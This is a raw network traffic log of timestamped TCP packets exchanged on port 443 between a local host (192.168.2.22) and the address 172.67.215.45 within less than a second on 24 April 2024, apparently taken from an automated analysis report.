Apr 24, 2024 07:32:46.032442093 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.032469034 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.034051895 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.034080982 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.034116983 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.034125090 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.034151077 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.035523891 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.035559893 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.035589933 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.035597086 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.035623074 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.037151098 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.037179947 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.037209034 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.037215948 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.037239075 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.037275076 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.038810968 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.038849115 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.038882017 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.038888931 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.038902044 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.040528059 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.040560007 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.040601015 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.040607929 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.040618896 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.040676117 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.041985989 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.042017937 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.042057991 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.042064905 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.042074919 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.043833971 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.043870926 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.043903112 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.043910027 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.043941021 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.045016050 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.045044899 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.045087099 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.045094967 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.045119047 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.047034025 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.047068119 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.047106028 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.047112942 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.047132015 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.048013926 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.048043013 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.048084021 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.048090935 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.048130035 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.049938917 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.049971104 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.050005913 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.050012112 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.050029039 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.051157951 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.051186085 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.051225901 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.051233053 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.051254034 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.053425074 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.053457975 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.053487062 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.053493977 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.053522110 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.054143906 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.054172993 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.054205894 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.054214954 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.054224968 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.054259062 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.055707932 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.055741072 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.055773973 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.055782080 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.055803061 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.057377100 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.057404995 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.057439089 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.057451963 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.057465076 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.059071064 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.059103966 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.059139013 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.059146881 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.059216022 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.060226917 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.060256958 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.060298920 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.060306072 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.060322046 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.061757088 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.061795950 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.061827898 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.061835051 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.061865091 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.063410044 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.063438892 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.063479900 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.063502073 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.063512087 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.064464092 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.064513922 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.064541101 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.064548969 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.064585924 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.066217899 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.066247940 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.066289902 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.066297054 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.066322088 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.067291975 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.067326069 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.067358017 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.067364931 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.067395926 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.068984032 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.069014072 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.069055080 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.069062948 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.069083929 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.070072889 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.070115089 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.070147991 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.070153952 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.070194006 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.071738005 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.071768045 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.071808100 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.071815014 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.071840048 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.073240995 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.073273897 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.073312998 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.073321104 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.073343992 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.074472904 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.074501991 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.074554920 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.074563980 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.074574947 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.076270103 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.076303005 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.076345921 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.076354027 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.076368093 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.077336073 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.077363968 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.077450037 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.077456951 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.077502012 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.078821898 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.078855038 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.078895092 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.078901052 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.078953981 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.080090046 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.080137014 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.080188036 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.080195904 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.080215931 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.081724882 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.081757069 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.081799030 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.081806898 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.081820011 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.083184004 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.083210945 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.083254099 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.083261967 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.083286047 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.084388971 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.084424019 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.084459066 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.084465027 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.084486961 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.085546017 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.085575104 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.085616112 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.085623026 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.085638046 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.087158918 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.087193966 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.087229967 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.087236881 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.087254047 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.088283062 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.088311911 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.088351965 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.088360071 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.088378906 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.090276003 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.090310097 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.090344906 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.090353012 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.090415001 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.091324091 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.091352940 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.091392040 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.091399908 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.092459917 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.092495918 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.093321085 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.093333006 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.093409061 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.093640089 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.093672037 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.093719959 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.093729019 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.093765974 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.094846964 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.094882011 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.094930887 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.094945908 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.094980001 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.096246958 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.096277952 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.096326113 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.096334934 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.096357107 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.097484112 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.097517967 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.097559929 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.097567081 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.097598076 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.098567009 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.098597050 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.098661900 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.098661900 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.098671913 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.099714041 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.099746943 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.099785089 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.099793911 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.099812984 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.100471973 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.100497961 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.100543022 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.100549936 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.100578070 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.101381063 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.101448059 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.101450920 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.101469040 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.101532936 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.102494001 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.102524042 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.102574110 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.102581024 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.102605104 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.103460073 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.103492975 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.103542089 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.103549957 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.103583097 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.104516983 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.104549885 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.104589939 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.104598999 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.104624033 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.105339050 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.105370045 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.105413914 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.105422974 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.105453014 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.106650114 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.106683016 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.106724977 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.106733084 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.106755972 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.108084917 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.108128071 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.108160019 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.108165979 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.108203888 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.109229088 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.109258890 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.109308958 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.109317064 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.109338999 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.110373020 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.110409975 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.110446930 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.110466957 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.110491991 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.111756086 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.111783981 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.111835957 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.111843109 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.111861944 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.113044977 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.113079071 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.113122940 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.113131046 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.113154888 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.114409924 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.114449024 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.114486933 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.114514112 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.114532948 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.115921974 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.115958929 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.115995884 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.116004944 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.116039991 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.117172956 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.117202997 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.117253065 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.117263079 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.117307901 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.118923903 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.118957996 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.119007111 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.119018078 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.119030952 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.120806932 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.120837927 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.120892048 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.120910883 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.120923996 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.121870041 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.121902943 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.121944904 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.121956110 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.121972084 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.123348951 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.123379946 CEST	443	49165	172.67.215.45	192.168.2.22
Apr 24, 2024 07:32:46.123435974 CEST	49165	443	192.168.2.22	172.67.215.45
Apr 24, 2024 07:32:46.123442888 CEST	443	49165	172.67.215.45	192.168.2.22
